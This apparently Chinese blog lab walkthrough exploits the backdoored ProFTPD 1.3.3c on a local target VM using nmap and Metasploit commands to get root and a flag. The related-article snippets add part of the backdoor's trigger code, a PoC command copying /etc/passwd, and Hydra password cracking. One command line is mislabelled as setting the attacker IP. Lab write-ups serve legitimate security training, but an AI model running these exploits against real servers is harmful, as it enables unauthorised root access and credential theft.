FTP服务proFTPD1.3.3C漏洞利用

最新推荐文章于 2023-11-27 18:17:16 发布
最新推荐文章于 2023-11-27 18:17:16 发布
阅读量462 收藏 2
点赞数 1
文章标签: 网络 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62272017/article/details/131334677
版权

FTP服务proFTPD1.3.3C漏洞利用

1.搭建环境

使用VMware虚拟机准备好测试的环境,

在这里插入图片描述

2.确认靶机IP

使用nmap

nmap 192.168.209.0/24

也可以加参数使用

nmap -sV 192.168.209.0/24

在这里插入图片描述

3.扫描靶机

使用nmap来扫描端口和运行服务
这里使用

nmap -T4 -A -v 192.168.209.129

在这里插入图片描述

4.渗透过程

使用msfconsole

search ProFTPD 1.3.3.c   #查询有无这个漏洞
use 0                                #使用
show payloads                 #查询使用方法
set payload 3                   #使用方法
show options                   #查询使用参数
set rhost 192.168.209.129 #设置靶机IP
set rhost 192.168.209.129 #设置攻击机IP
run                                   #执行

在这里插入图片描述
在这里插入图片描述

5.拿到flag

在这里插入图片描述

输入id查看用户权限发现已经是rootd啦,进入/root目录下查看flag

爱喝清粥
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&未授权访问
ran的博客
05-09 1971
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSH、FTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞。
ProFTPd 远程拒绝服务漏洞 (APP,缺陷)
Chendy的专栏
04-11 892
涉及程序: ProFTPd   描述: ProFTPd 内存泄露引起拒绝服务攻击   详细: ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。 当 ProFTPd 执行 SIZE FTP
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1126
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
渗透实战靶机3wp
0nc3的博客
11-07 403
目标IP:xxxx.95测试IP:xxxx.96测试环境:win10、kali等测试时间:2021.7.23-2021.7.26测试人员:ruanruanwordpress后台getshell,在线编辑位置尝试错误对wordpress后台常见的getshell方法不够熟练,都尝试下从菜刀直接反弹shell到kali失败,显示/bin/sh,语法错误webshell不是完整的交互式shell,通过bash -c 'xxx’解决找marlinspike密码时没有直接尝试用户名。
ProFTPD-1.3.3c Backdoor Command Execution漏洞复现+poc
最新发布
开心星人的博客
11-27 764
https://blog.csdn.net/morrino/article/details/115836400 这个文章提供了一个部署1.3.3c版本的靶机。安装 https://blog.csdn.net/feelinghappy/article/details/106817434。https://www.exploit-db.com/exploits/15662 找到了存在后门的软件。在官网和官方github上找了一圈1.3.3c版本的proftpd,应该是漏洞太多,官方把下了。
CentOS 7下安装配置proftpd搭建ftp服务器的详细教程
09-30
主要介绍了CentOS 7下安装配置proftpd搭建ftp服务器的详细教程,需要的朋友可以参考下
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试...
开源FTP服务端工具proftpd源码
08-18
这是开源FTP服务端工具proftpd源码,最新版哪里去下载想必大家都知道,我只是源码的搬用工,赚点分花花,谢谢大家。
LNMP下FTP服务器的安装与使用方法(Pureftpd和Proftpd)
01-10
一、Proftpd在LNMP 1.0中增加了Proftpd服务器安装脚本,proftpd可以通过...添加FTP用户执行:root/proftpd_vhost.sh提示“Please input a username:” 后输入要添加飞FTP用户名,回车确认。之后会提示“Please set pas
funbox11靶机(ProFTPD1.3.3c提权漏洞)
m0_66299232的博客
11-13 466
3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。3.按照格式输出命令,成功进去root,轻松拿下!攻击机系统:kali linux 2021.1。1.用smbmap登录smb服务,查找利用信息。1.自己谷歌下版本漏洞可以找到利用的脚本。4.保存到当前目录,查看下,没啥大用。2.执行后发现usage,给出执行格式。2.用wpscan暴力破解用户名密码。2.用gobuster进行目录扫描。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。ProFTPD1.3.3c提权漏洞
Linux Apache+Proftpd构建虚拟主机时要注意的几个安全问题
09-16
Linux下Apache+Proftpd构建虚拟主机时要注意的几个安全问题,大家可以参考下,有其它未完整的地方,大家可以补充下。
proftpd-1.3.3.tar.gz
11-16
ubuntu ftp server 用于在UBUNTU 系统下搭建FTP服务,很好用!注意只能用地linux系统。
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 1943
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
4.10、漏洞利用-Proftpd、Mysql、Postgresql
c10udz的博客
11-23 803
proftpd的全称是Professional FTP daemon,类unix和unix平台FTP服务器程序,默认使用2121号端口,与vsftpd类似开源。 MySQL是关系型数据库管理系统,默认使用3306端口。关系数据库将数据保存在不同的表中;非关系型数据库,把数据存储到大的内存当中,而不是存储到大的表当中。postgresql(pg)是开源关系型数据库,最开始叫postgres,默认使用5432端口。
[转帖] 小心ProFTPD 1.3.3c源码被人插入后门
weixin_34384681的博客
11-12 630
http://www.exploit-db.com/exploits/15662/这里说到,rsync.proftpd.org 服务器存在一个漏洞,被黑客攻击得手,然后修改了官方提供用户下载的proftpd源码包,在代码中加入了后门! 注意看这里 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid...
6-20漏洞利用-proftpd测试
山兔的博客
07-28 661
ProFTPD一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序http可以下载对应的版本,然后进行环境搭建。
FTP服务后门利用
qq_39687353的博客
04-11 934
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
ProFTPD远程命令执行漏洞或影响100多万台服务
NOSEC2019的博客
07-23 1228
ProFTPD是一个开源,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一,且同时支持Pure-FTPD和vsftpd。 而最近,ProFTPD被曝出任意文件复制漏洞,可导致超过一百万多台安装了ProFTPD的服务器受到远程命令执行和信息泄漏攻击。 所有版本在1.3.5b及其以下的ProFTPD软件都会受到该漏洞影响,攻击者只要成功利用...
vulnhub -digitalworld.local: JOY (考点:ftp&ProFTPD漏洞/ linux提权知识)
冬萍子癸水
04-24 1168
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很多端口,25和110想到smtp枚举邮件用户,和邮件查看。22想到ssh登录139 445想到smb查看敏感文件,21想到ftp查看敏感文件。 PORT STATE SERVICE VER...
proftpd 漏洞详情 是否存在vsftpd漏洞
06-08
ProFTPD 曾经存在多个安全漏洞,包括远程执行代码漏洞(CVE-2019-12815)、拒绝服务漏洞(CVE-2015-3306)、未授权访问漏洞(CVE-2014-3529)等。这些漏洞可能导致攻击者远程执行任意代码、拒绝服务攻击、未授权访问等安全问题。 与 vsftpd 漏洞不同,ProFTPD 漏洞主要是由于软件本身的代码缺陷或配置不当导致的。因此,如果您使用 ProFTPD 作为 FTP 服务器,建议您及时升级到最新版本,以避免受到已知漏洞的攻击,并加强服务器的安全配置,例如限制用户的访问权限、启用防火墙等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱喝清粥

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值